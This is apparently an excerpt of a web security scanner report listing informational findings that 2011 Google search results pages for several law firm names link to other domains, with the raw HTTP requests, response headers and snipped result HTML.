<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zkp9vb4oqqAJ:www.jdtplaw.com/CM/Custom/Contact.asp+Jackson+DeMarco+Tidus+Peckenpaugh&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDoQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pview.findlaw.com/cmd/view?wld_id=1511516&amp;pid=1" class=l onmousedown="return clk(this.href,'','','','5','','0CD0QFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:v70XgTXqof0J:pview.findlaw.com/cmd/view%3Fwld_id%3D1511516%26pid%3D1+Jackson+DeMarco+Tidus+Peckenpaugh&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:v70XgTXqof0J:pview.findlaw.com/cmd/view%3Fwld_id%3D1511516%26pid%3D1+Jackson+DeMarco+Tidus+Peckenpaugh&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEIQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://lawyers.webdesigntops.com/California/Westlake-Village/Jackson-DeMarco-Tidus-Peckenpaugh/" class=l onmousedown="return clk(this.href,'','','','6','','0CEMQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Cr_ZgITvC_EJ:lawyers.webdesigntops.com/California/Westlake-Village/Jackson-DeMarco-Tidus-Peckenpaugh/+Jackson+DeMarco+Tidus+Peckenpaugh&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEgQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/California/Irvine/Jackson-DeMarco-Tidus-Peckenpaugh,-A-Law-Corporation-109394-f.html" class=l onmousedown="return clk(this.href,'','','','7','','0CEkQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:_rloYTeUQeQJ:www.lawyers.com/California/Irvine/Jackson-DeMarco-Tidus-Peckenpaugh,-A-Law-Corporation-109394-f.html+Jackson+DeMarco+Tidus+Peckenpaugh&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFAQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Jackson-DeMarco-Tidus-Peckenpaugh/109394-law-firm-office.htm" class=l onmousedown="return clk(this.href,'','','','8','','0CFIQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:cC4w0CngTZcJ:www.martindale.com/Jackson-DeMarco-Tidus-Peckenpaugh/109394-law-firm-office.htm+Jackson+DeMarco+Tidus+Peckenpaugh&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFcQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/california-southern/lawfirm/Jackson-DeMarco-Tidus-Peckenpaugh/0aad5450-f7f5-43fd-a9db-20590ab651fa.html" class=l onmousedown="return clk(this.href,'','','','9','','0CFgQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tchRZlM6U3gJ:www.superlawyers.com/california-southern/lawfirm/Jackson-DeMarco-Tidus-Peckenpaugh/0aad5450-f7f5-43fd-a9db-20590ab651fa.html+Jackson+DeMarco+Tidus+Peckenpaugh&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CF0QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/title/attorney/at-jackson-demarco-tidus-peckenpaugh" class=l onmousedown="return clk(this.href,'','','','10','','0CF4QFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Jq9Y37eQnm8J:www.linkedin.com/title/attorney/at-jackson-demarco-tidus-peckenpaugh+Jackson+DeMarco+Tidus+Peckenpaugh&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGMQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.kmob.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CGUQoggwCg')">Knobbe, Martens, Olson & Bear, LLP</a>
...[SNIP]...
<div><a href="http://www.dsprel.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CGcQoggwCw')">Daly-Swartz Public Relations</a>
...[SNIP]...
<div><a href="http://www.manatt.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CGkQoggwDA')">Manatt.com</a>
...[SNIP]...
<div><a href="http://www.alston.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CGsQoggwDQ')">Alston & Bird</a>
...[SNIP]...
24.27. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Ober+Kaler&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:08:02 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 79363

<!doctype html> <head> <title>Ober Kaler - Google Search</title> <script>window.google={kEI:"4gXMTeOVJqXt0gGM8bzhBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,29795,298
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Ober+Kaler&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ober.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBgQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QtiMh84zhlIJ:www.ober.com/+Ober+Kaler&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB0QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.ober.com/attorneys/search" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://www.ober.com/contact_us/index" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoATAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.ober.com/recruiting/life-at-ober-kaler" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoAjAA')">Recruiting</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.ober.com/our_firm/about-oberkaler" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoAzAA')">Our Firm</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.ober.com/practices/index" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoBDAA')">Practices</a></div><div class=sld><a class=sla href="http://www.ober.com/publications/index" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoBTAA')">Publications</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.ober.com/practices/health" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoBjAA')">Health</a></div><div class=sld><a class=sla href="http://www.ober.com/news_events/index" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoBzAA')">News &amp; Events</a>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.ober.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CCkQoAIwAQ')" title="Ober Kaler Grimes &amp;amp; Shriver: Oppel Jerald J" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 0;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.ober.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CCkQoAIwAQ')" title="Ober Kaler Grimes &amp;amp; Shriver: Oppel Jerald J"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.ober.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CDAQoAIwAg')" title="Ober/Kaler" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -38px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.ober.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CDAQoAIwAg')" title="Ober/Kaler"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.ober.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CDcQoAIwAw')" title="Ober Kaler Grimes Shriver: Robertson Kevin M" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -76px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.ober.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CDcQoAIwAw')" title="Ober Kaler Grimes Shriver: Robertson Kevin M"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.ober.com/attorneys/search" class=l onmousedown="return clk(this.href,'','','','5','','0CEIQFjAE')">Attorneys - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:2oWZ2SHDySgJ:www.ober.com/attorneys/search+Ober+Kaler&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEcQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ober.com/contact_us/index" class=l onmousedown="return clk(this.href,'','','','6','','0CEkQFjAF')">Contact Us - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:S9uvBzAnsQ8J:www.ober.com/contact_us/index+Ober+Kaler&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CE4QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ober.com/attorneys/cynthia-sanders" class=l onmousedown="return clk(this.href,'','','','7','','0CFAQFjAG')">Cynthia Sanders - Intellectual Property Lawyer at <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:V-Nw9cfJl0EJ:www.ober.com/attorneys/cynthia-sanders+Ober+Kaler&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFgQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bizjournals.com/baltimore/stories/2010/04/05/daily27.html" class=l onmousedown="return clk(this.href,'','','','8','','0CFsQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AUFh5MdyvqwJ:www.bizjournals.com/baltimore/stories/2010/04/05/daily27.html+Ober+Kaler&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CGAQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://abovethelaw.com/tag/ober-kaler/" class=l onmousedown="return clk(this.href,'','','','9','','0CGIQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:TtYpNKPTcngJ:abovethelaw.com/tag/ober-kaler/+Ober+Kaler&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGcQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.indeed.com/cmp/Ober-Kaler" class=l onmousedown="return clk(this.href,'','','','10','','0CGgQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:bpkaHWxD8HUJ:www.indeed.com/cmp/Ober-Kaler+Ober+Kaler&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CG0QIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&amp;-Shriver?companyId=38457" class=l onmousedown="return clk(this.href,'','','','11','','0CG4QFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:UtrToAUFnK0J:www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-%26-Shriver%3FcompanyId%3D38457+Ober+Kaler&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:UtrToAUFnK0J:www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-%26-Shriver%3FcompanyId%3D38457+Ober+Kaler&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CHMQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jdsupra.com/profile/oberkaler/" class=l onmousedown="return clk(this.href,'','','','12','','0CHQQFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AKt0ZgKrZs4J:www.jdsupra.com/profile/oberkaler/+Ober+Kaler&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CHkQIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://articles.baltimoresun.com/2010-04-08/business/bal-ober-kaler-0408_1_legg-mason-tower-ober-kaler-light-street" class=l onmousedown="return clk(this.href,'','','','13','','0CHoQFjAM')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Ug6JvcFDHmIJ:articles.baltimoresun.com/2010-04-08/business/bal-ober-kaler-0408_1_legg-mason-tower-ober-kaler-light-street+Ober+Kaler&amp;cd=13&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','13','','0CH8QIDAM')">Cached</a>
...[SNIP]...
<div><a href="http://www.gfrlaw.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CIEBEKIIMA0')">gfrlaw</a>
...[SNIP]...
<div><a href="http://www.wtplaw.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CIMBEKIIMA4')">Whiteford, Taylor and Preston</a>
...[SNIP]...
<div><a href="http://www.ppsv.com/" class=l onmousedown="return clk(this.href,'','','','16','','0CIUBEKIIMA8')">Powers Pyles</a>
...[SNIP]...
<div><a href="http://www.milesstockbridge.com/" class=l onmousedown="return clk(this.href,'','','','17','','0CIcBEKIIMBA')">Miles & Stockbridge</a>
...[SNIP]...
24.28. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Neal+Gerber+%26+Eisenberg&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:08:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 75185

<!doctype html> <head> <title>Neal Gerber &amp; Eisenberg - Google Search</title> <script>window.google={kEI:"7QXMTfTWGYnn0QHAlL2BBw",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,2922
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Neal+Gerber+%26+Eisenberg&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ngelaw.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBkQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:8ZVGF_u_p9sJ:www.ngelaw.com/+Neal+Gerber+%26+Eisenberg&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:8ZVGF_u_p9sJ:www.ngelaw.com/+Neal+Gerber+%26+Eisenberg&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CB4QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.ngelaw.com/attorney/attorney.aspx" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://chicago.ngelaw.com/" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoATAA')">Extranet Login</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.ngelaw.com/career/career.aspx?ID=5108" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoAjAA')">Careers</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.ngelaw.com/practice/practice.aspx?ID=5110" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoAzAA')">Practice Areas</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.ngelaw.com/about/about.aspx?ID=5102" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoBDAA')">About the Firm</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ngelaw.com/attorney/attorney.aspx" class=l onmousedown="return clk(this.href,'','','','3','','0CC8QFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nm0FEKFYoRkJ:www.ngelaw.com/attorney/attorney.aspx+Neal+Gerber+%26+Eisenberg&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:nm0FEKFYoRkJ:www.ngelaw.com/attorney/attorney.aspx+Neal+Gerber+%26+Eisenberg&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CDQQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ngelaw.com/career/career.aspx?ID=5108" class=l onmousedown="return clk(this.href,'','','','4','','0CDYQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:D5bNfoOLXwAJ:www.ngelaw.com/career/career.aspx%3FID%3D5108+Neal+Gerber+%26+Eisenberg&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:D5bNfoOLXwAJ:www.ngelaw.com/career/career.aspx%3FID%3D5108+Neal+Gerber+%26+Eisenberg&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CDsQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ngelaw.com/career/career.aspx?ID=5152" class=l onmousedown="return clk(this.href,'','','','5','','0CD0QFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:HmqDOBlPcy0J:www.ngelaw.com/career/career.aspx%3FID%3D5152+Neal+Gerber+%26+Eisenberg&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:HmqDOBlPcy0J:www.ngelaw.com/career/career.aspx%3FID%3D5152+Neal+Gerber+%26+Eisenberg&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEIQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=2383947" class=l onmousedown="return clk(this.href,'','','','6','','0CEUQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zx8o4pKN2poJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D2383947+Neal+Gerber+%26+Eisenberg&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:zx8o4pKN2poJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D2383947+Neal+Gerber+%26+Eisenberg&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEoQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://newsblogs.chicagotribune.com/chicago-law/neal-gerber-eisenberg/" class=l onmousedown="return clk(this.href,'','','','7','','0CEwQFjAG')">Chicago Law: <em>
...[SNIP]...
<h3 class="r"><a href="http://bestlawfirms.usnews.com/firms/neal-gerber-eisenberg-llp/overview/3806/" class=l onmousedown="return clk(this.href,'','','','8','','0CFIQFjAH')">U.S. News - Best Lawyers - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:99bCcdee02oJ:bestlawfirms.usnews.com/firms/neal-gerber-eisenberg-llp/overview/3806/+Neal+Gerber+%26+Eisenberg&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:99bCcdee02oJ:bestlawfirms.usnews.com/firms/neal-gerber-eisenberg-llp/overview/3806/+Neal+Gerber+%26+Eisenberg&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CFcQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Neal-Gerber-Eisenberg-LLP/930636-law-firm-office.htm" class=l onmousedown="return clk(this.href,'','','','9','','0CFgQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:GHEG31zlUawJ:www.martindale.com/Neal-Gerber-Eisenberg-LLP/930636-law-firm-office.htm+Neal+Gerber+%26+Eisenberg&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:GHEG31zlUawJ:www.martindale.com/Neal-Gerber-Eisenberg-LLP/930636-law-firm-office.htm+Neal+Gerber+%26+Eisenberg&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CF0QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/neal-gerber-&amp;-eisenberg-llp" class=l onmousedown="return clk(this.href,'','','','10','','0CF4QFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Ot9DzCHhYGYJ:www.linkedin.com/company/neal-gerber-%26-eisenberg-llp+Neal+Gerber+%26+Eisenberg&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Ot9DzCHhYGYJ:www.linkedin.com/company/neal-gerber-%26-eisenberg-llp+Neal+Gerber+%26+Eisenberg&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CGMQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nealgerber.com/news/pubs_detail.aspx?ID=1291" class=l onmousedown="return clk(this.href,'','','','11','','0CGQQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:vmtgurGLF4QJ:www.nealgerber.com/news/pubs_detail.aspx%3FID%3D1291+Neal+Gerber+%26+Eisenberg&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:vmtgurGLF4QJ:www.nealgerber.com/news/pubs_detail.aspx%3FID%3D1291+Neal+Gerber+%26+Eisenberg&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CGkQIDAK')">Cached</a>
...[SNIP]...
<div><a href="http://www.marshallip.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CGsQoggwCw')">Marshall, Gerstein & Borun LLP</a>
...[SNIP]...
<div><a href="http://www.quarles.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CG0QoggwDA')">Quarles & Brady, LLP</a>
...[SNIP]...
<div><a href="http://www.wildman.com/index.cfm" class=l onmousedown="return clk(this.href,'','','','14','','0CG8QoggwDQ')">Wildman Harrold</a>
...[SNIP]...
<div><a href="http://www.schiffhardin.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CHEQoggwDg')">Schiff Hardin LLP</a>
...[SNIP]...
24.29. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Smith+Mazure&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:02:06 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 67679

<!doctype html> <head> <title>Smith Mazure - Google Search</title> <script>window.google={kEI:"fgTMTe_MGeXq0QH6hLyBBw",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,29795,2
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Smith+Mazure&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.smithmazure.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBkQFjAA')"><em>
...[SNIP]...
